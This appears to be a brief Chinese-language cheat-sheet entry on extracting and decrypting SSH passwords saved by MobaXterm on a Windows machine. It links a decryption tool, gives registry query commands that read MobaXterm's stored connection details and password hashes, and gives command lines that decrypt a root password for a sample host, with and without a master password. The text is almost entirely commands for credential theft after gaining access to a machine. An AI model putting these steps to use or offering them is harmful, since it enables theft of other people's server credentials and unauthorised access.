工具链接
https://github.com/HyperSine/how-does-MobaXterm-encrypt-password
不带管理密码
无管理密码的解密,直接读注册表,从注册表读连接信息和账户hash
reg query HKEY_CURRENT_USERSoftwareMobatekMobaXterm
reg query HKEY_CURRENT_USERSoftwareMobatekMobaXtermP
解密如下python3 MobaXtermCipher.py dec -h 192.168.3.130 -u root lJWaoLu57REbPnQW62E0fUpfVA38r/hKFtVH4
python3 MobaXtermCipher.py dec -sysh desktop-ibe7jr7 主机名 -sysu yang 用户名 -h 192.168.3.130 -u root lJWaoLu57REbPnQW62E0fUpfVA38r/hKFtVH4
python3 MobaXtermCipher.py dec -sysh 主机名 -sysu 用户名 -h 192.168.3.130 -u 用户名 注册表内密码
带管理密码
此处至于怎么获取管理密码需个人解决
reg query HKEY_CURRENT_USERSoftwareMobatekMobaXtermP
python3 MobaXtermCipher.py dec -p 管理密码 注册表内密码